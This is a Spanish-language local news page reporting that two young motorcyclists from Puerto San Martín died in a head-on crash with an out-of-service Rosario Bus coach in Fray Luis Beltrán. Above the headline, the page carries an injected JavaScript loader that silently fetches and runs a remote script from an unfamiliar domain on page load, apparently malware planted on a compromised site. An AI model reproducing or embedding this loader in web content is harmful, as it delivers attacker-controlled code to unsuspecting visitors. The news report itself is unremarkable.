;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tragedia en Beltrán: murieron dos pibes de Puerto al chocar contra un colectivo

Tragedia en Beltrán: murieron dos pibes de Puerto al chocar contra un colectivo

Read Time:1 Minute, 1 Second

Las víctimas fatales tenían 18 y 20 años. Colisionaron de frente contra un ómnibus que no llevaba pasajeros en Avenida San Martín y Pueyrredón.

Dos motociclistas de 18 y 20 años murieron esta madrugada de domingo tras protagonizar un fatal choque frontal contra un colectivo que no estaba en servicio en zona sur de la localidad de Fray Luis Beltrán.

El trágico siniestro vial se produjo en Avenida San Martín y Pueyrredón. Según información preliminar, los conductores de la moto eran oriundos de Puerto San Martín y chocaron contra un ómnibus que circulaba sin pasajeros.

La moto Honda Wave era conducida por un joven de 20 años, que llevaba como acompañante a una chica de 18, precisaron luego desde la Unidad Regional XVII. Los dos terminaron sin vida en la calzada.

El otro vehículo involucrado fue un colectivo de línea de la empresa Rosario Bus, interno 3084, conducido por un chofer de 55 años, oriundo de la ciudad de Granadero Baigorria, informaron.

En el lugar trabajaron personal policial de la Comisaría 4ª y del Comando Radioeléctrico, servicios de emergencias para constatar el fallecimiento de ambos motociclistas y luego Bomberos Zapadores para levantar los cuerpos, y Voluntarios locales para hacer limpieza de la calzada.

Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %

Average Rating

5 Star
0%
4 Star
0%
3 Star
0%
2 Star
0%
1 Star
0%

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Previous post Bomberos desplegaron impactante simulacro en el Intercambiador
Next post Hallazgo de 100 kilos que cocaína. Un ante y un después en la seguridad de los puertos